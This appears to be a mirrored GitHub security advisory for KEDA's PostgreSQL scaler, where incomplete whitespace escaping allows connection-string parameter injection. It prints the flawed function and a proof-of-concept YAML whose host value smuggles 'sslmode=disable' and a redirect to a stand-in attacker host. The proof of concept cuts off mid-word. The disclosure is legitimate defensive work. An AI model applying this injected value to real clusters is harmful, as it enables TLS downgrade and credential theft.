GHSA-6w3m-4hhp-775q: KEDA has PostgreSQL connection string parameter injection via incomplete whitespace escaping
Summary
pkg/scalers/postgresql_scaler.go builds libpq-style connection strings by concatenating key=value pairs separated by spaces. Each tenant-controllable field (host, port, userName, dbName, sslmode) is passed through escapePostgreConnectionParameter:
func escapePostgreConnectionParameter(str string) string {
if !strings.Contains(str, " ") {
return str // returned as-is for any non-space whitespace
}
str = strings.ReplaceAll(str, "'", "\\'")
return fmt.Sprintf("'%s'", str)
}
The function only escapes when a literal space is present. Per libpq/pgx documentation, parameters are also separated by tabs, newlines, carriage returns, and form feeds, and backslashes are parsed inside quoted strings. Because those characters are not detected, a tenant-supplied value like mydb\tsslmode=disable\thost=attacker.example.com splits into additional key=value tokens when parsed by pgx, injecting attacker-controlled connection parameters.
Vulnerable code
pkg/scalers/postgresql_scaler.go, lines 155–164 and 250–257.
Impact
Tenants with the ability to create a TriggerAuthentication or ScaledObject that populates any of host, port, userName, dbName, sslmode can:
- Force sslmode=disable on a connection that the cluster owner intended to be TLS-only — silently downgrading to plaintext and enabling on-path MitM.
- Redirect the connection to an attacker-controlled host (host=...) to steal the credentials the operator supplies via the password= keyword.
- Append arbitrary libpq runtime parameters (options=, application_name=, target_session_attrs=) to pivot behavior.
Note: the password parameter is appended last in buildConnArray, which limits but does not eliminate credential exfiltration — injected host= still redirects the subsequent password= keyword's target.
Proof of concept
triggers:
- type: postgresql
metadata:
host: "legit.db.svc\tsslmode=disable\thost=attacker.example.com"
port: "5432"
userName: "keda"
dbName: "metrics"
sslmode: "require"
query: "SELECT 1"
After escapePo
Details
Original advisory: https://github.com/advisories/GHSA-6w3m-4hhp-775q
Referenced CVEs
| CVE | CSIRTS overview | External |
|---|---|---|
| CVE-2026-53572 | coverage & exploitation status | NVD · CVE.org |
More from GitHub Security Advisories
- criticalGHSA-g936-7jqj-mwv8: TSDProxy: Internal proxy auth token forwarded to backend services enables management API …2026-07-10
- highGHSA-fpg8-7664-jc5q: melange: Incomplete package integrity verification allows data section substitution2026-07-10
- mediumGHSA-48rx-c7pg-q66r: Excon does not redact additional sensitive/risky headers when following redirects2026-07-10
- highGHSA-h4g2-xfmw-q2c9: Clauster: Non-loopback deployments can serve the dashboard unauthenticated when auth.enab…2026-07-10
- mediumGHSA-rqq5-2gf9-4w4q: Secure Headers: CSP directive injection via sandbox, plugin_types, and report_to when giv…2026-07-10